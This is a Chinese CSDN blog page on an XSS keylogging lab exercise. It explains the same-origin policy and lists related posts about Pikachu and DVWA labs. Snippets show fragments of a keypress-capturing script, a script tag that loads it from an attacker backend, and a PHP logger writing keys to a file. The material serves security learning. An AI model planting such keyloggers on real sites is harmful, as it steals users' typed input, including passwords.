XSS获取键盘记录练习

最新推荐文章于 2024-09-05 16:05:16 发布
最新推荐文章于 2024-09-05 16:05:16 发布
阅读量1.1k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44720762/article/details/89766484
版权
本文探讨了XSS攻击中获取键盘记录的练习,解释了跨域和同源策略的概念,以及它们在阻止恶意脚本执行中的作用。通过示例代码展示了XSS漏洞如何被利用来捕获用户输入,同时强调了同源策略限制了这种跨域操作,以保护用户信息安全。博客旨在分享安全知识,不鼓励实际攻击行为。
摘要由CSDN通过智能技术生成

在开始本篇博客之前,我想先声明,本人初涉安全领域知识,此博客用于记录日常渗透练习心得,并不提倡用着专业指导知识,请选择性阅读。

因为相关知识的练习性,先对部分名词含义进行说明。
跨域:
URL(统一资源定位符)中有
协议,子域名,主域名,端口,资源地址。在任意两个URL中这几个部分中任意部分纯在不同就是跨域操作。我们把任意两个域间进行的资源访问操作称为跨域操作。在这里插入图片描述
同源策略:同源策略(Same origin policy)是一种约定,它是浏览器最核心也最基本的安全功能,如果缺少了同源策略,则浏览器的正常功能可能都会受到影响。可以说Web是构建在同源策略基础之上的,浏览器只是针对同源策略的一种实现。
所谓同源是指,域名,协议,端口相同
当浏览器的百度tab页执行一个脚本的时候会检查这个脚本是属于哪个页面的,
即检查是否同源,只有和百度同源的脚本才会被执行。 [1]
如果非同源,那么在请求数据时,浏览器会在控制台中报一个异常,提示拒绝访问。
即两个不同域名之间不能通过javascript来操作。比方说A.COM下的js就不可以操作B.COM下的对象。
当然,如果真的想要实现跨域操作是不是就没办法实现了呢,也不是,管理员可以通过header()指定。

同时,也不是所有的URL都服从同源策略:

最低0.47元/天 解锁文章
三块五的咸菜干
关注
XSS跨站脚本攻击:获取键盘记录
jklbnm12的博客
01-20 879
将进行下图3个实验,更好的来理解xss的危害和原理 先去修改下Pikachu靶机中的,cookie.php修改成自己的ip 实验1:xss如何获取cookie? 只需要将  Pikachu靶机中的pkxss文件复制到攻击机中的站点(www)下即可。 登入下      默认没任何数据 1.1 GET型XSS利用:cookie获取 先将字符长度的限制给修改掉 pkxss后台: http://192.168.43.117/pkxss/pkxss_login.php 现在是没
xss-键盘记录
weixin_46164380的博客
03-08 232
开启liunx的apache服务。 /etc/init.d/apache2 start 在/var/www/html下面创建三个文件 keylogger.js document.onkeypress = function(evt) { evt = evt || window.event key = String.fromCharCode(evt.charCode) if...
Pikachu-XSS漏洞之cookie值获取、钓鱼结果和键盘记录实战记录
m0_74608722的博客
08-17 1147
我们可以向用户发送一个链接请求,用户点击后会给我们提前搭建好的后台发出一个请求,后台收到请求后会返回一个身份信息验证的Basic头部,如果用户安全意识不够,输入了敏感信息:用户名和密码,然后这些就会被发送到pkxss后台。首先我们登录进去,我们发现界面和get型的是完全一样的,我们随便输入点东西:发现并没有在url里面显示,那怎么回事那,其实这个就是post型的,请求是通过post的方式发送的。**好了,所有的Pikachu模块我们都已经练习完了,但是还遗留下一些实战训练,我们今天就来一口气完成!
3-8案例演示-xss获取键盘记录实验演示
山兔的博客
04-26 1056
在实验前,先了解一下什么是跨域 因为在这个实验里面,我们会去远程的调用js文件,远程调用js会涉及到跨域请求的问题 http:// www . xyz.com : 8080 / script/test.js 协议 子域名 主域名 端口 资源地址 当协议、主机(主域名、子域名)、端口中的任意一个不相同时,称为不同域 我们把不同的域之间请求数据的操作,成为跨域操作 跨域-同源策略 而为了安全考虑,所有的浏览器都约定了“同源策略”,(同源策略是在浏览器端去执行的)同源策略规定,两个不同
XSS跨站脚本攻击之——XSS获取键盘记录
温柔小薛的博客
04-05 520
XSS获取键盘记录 条件比较苛刻 除非对方网站管理员配置了跨域访问否则无法实现 理论 什么是跨域 http:// www. oldboyedu.com :80 / news/index.php 协议 :// 子域名 . 主域名 : 端口 / 资源地址 当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域。我们把不同的域之间请...
pikachu之xss获取键盘记录
2301_80661529的博客
02-28 742
此处xss漏洞主要利用src属性的跨站访问,使得被攻击者可以通过src属性自动跳转到攻击者的xss平台,祝各位学习顺利!
利用XSS漏洞获取键盘记录
weixin_73049307的博客
09-05 535
(win11本机中开启phpstudy,让虚拟机win7进行访问,win7是受害者)若是想结束“键盘记录”就得删了存储记录或者初始化pikachu靶场。(当然,键盘记录也只是局限于xss存储型页面)
XSS跨站脚本攻击理论和实战 XSS构造脚本+手动XSS+利用BEef自动化XSS(网络安全学习13)
Until_U的博客
07-06 5812
CONTENTS 1 XSS简介 2 构造XSS脚本 2.1 常用的HTML标签 2.2 常用java script方法 2.3 构造XSS脚本 3 反射型XSS 4 存储型XSS 5 kali渗透获取cookie 6 自动化XSS 6.1 BEef简介 6.2 BEef的主要功能 6.3 BEef实战 1 XSS简介 (1)XSS相关概念 跨站脚本( cross site script )为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现...
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3236
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
XSS跨站脚本攻击
weixin_46248422的博客
06-30 467
1.XSS是跨站脚本攻击,属于客户端攻击,受害者最终是用户,特别注意的是网站管理员也是用户之一,这就意味着XSS可以进行服务端攻击, 2.XSS攻击最终目的是在网页中嵌入客户端恶意脚本代码,最常用的攻击脚本代码是javescript,但也会 使用其他的脚本语言。 出现的原因:程序员对输入和输出控制不严格,导致“”“精心构造”的脚本输入后,在输到前端时浏览器当做有效代码解析执行而产生。 XSS的危害:劫持用户的cookies;框架钓鱼;挂马;键盘记录; 3.xss分类pikachu里面可以进行练习:反
直接访问键盘控制芯片获取键盘记录
03-02
如果要截取QQ这种hook键盘中断处理程序的保护技术,像全局钩子、驱动过滤钩子等技术都无能为力了——但是,如果我们能够直接指导硬件的输出地址的话,嘿嘿...
键盘记录击键记录器(键盘木马)
04-22
 Master Keystroke Logger是一款键盘记录击键记录器。可让您了解其他人在你的电脑做了什么,它是专为隐藏的计算机监控和计算机活动监控。(英文版。需较强的英文功底才可使用)
xss漏洞攻防
mackilo的博客
12-20 9328
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。xss是一种发生在web前端的漏洞,所以其危害的对象也主要是前端用户在WEB2.0时代,强调的是互动,使得用户输入信息的机会大增,在这个情况下,我们作为开发者,在开发的时候,要提高警惕。
pikachu漏洞靶机之xss获取键盘记录
weixin_43803070的博客
06-01 1438
在实验前,先了解一下什么是跨域 http:// www . xyz.com : 8080 / script/test.js 协议 子域名 主域名 端口 资源地址 当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域 我们把不同的域之间请求数据的操作,成为跨域操作。 跨域-同源策略 而为了安全考虑,所有的浏览器都约定...
xss获取键盘记录实验演示
北冥有鱼
04-20 1474
在实验之前,我们首先来了解一下什么事跨域 跨域-同源策略 为什么要有同源策略 没有的话只需要一个url就可以盗取你的信息了,不需要xss漏洞 我们来到pikachu,进入xss的存储型 我们首先来看一下后台,在pikachu xss的后台有键盘记录这么一个目录 我们需要去嵌入一个能够调用我们的远程js的方法 把这段代码放进去,点提交后,这个js就被嵌入到这个页面中了 我们打开控制台...
XSS漏洞利用---键盘记录
Ethan024的博客
03-13 476
XSS漏洞利用(本文仅供技术学习与分享) 存储型XSS漏洞之钓鱼 实验准备: 皮卡丘靶场; 存在存储型xss漏洞的网页; pkxss键盘记录后台; 实验步骤: 4. 嵌入恶意的js标签 — src=“http://localhost/pikaqiu.cn/pkxss/rkeypress/rk.js” 5. 在输入框中输入字符串:111111并查看后台,发现已经记录。 Tips: 如果无法记录数据,需关闭浏览器的同源策略Access-Contrl-Allow-Origin. ...
xss盗取键盘记录实例
whoim_i的博客
11-06 1149
本实验以反射型xss漏洞为例 实验环境:kali 192.168.133.131 dvwa靶机 192.168.133.128 1、首先看起kali上的apache服务,命令: /etc/init.d/apache2 start 2、在kali的浏览器输入:http://192.168.133.131 或 http://localhost 地址进行访问测试,检查apache是否开启成功 3、 ...
XSS漏洞利用——键盘记录
cxrpty的博客
02-21 1413
实验环境:DVWA 实验原理:网页被植入xss脚本,普通用户访问此网页时,该用户在当前页面上所有的键盘按键都会被记录下来,并且发送到远端服务器 实验步骤: 一、在服务器创建一个keylog.php文件获取键盘记录,并将记录写入key.txt中。 php代码如下: <?php $file=fopen("key.txt","a"); if(isset($_REQUEST['key']...
xss键盘记录脚本代码
最新发布
09-13
由于XSS(跨站脚本攻击)主要是用于注入恶意代码,而不是直接获取用户的键盘记录数据,所以它本身并不包含键盘记录脚本。然而,过去一些恶意的XSS脚本可能会利用JavaScript来模拟键盘事件(比如`document.onkeydown`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值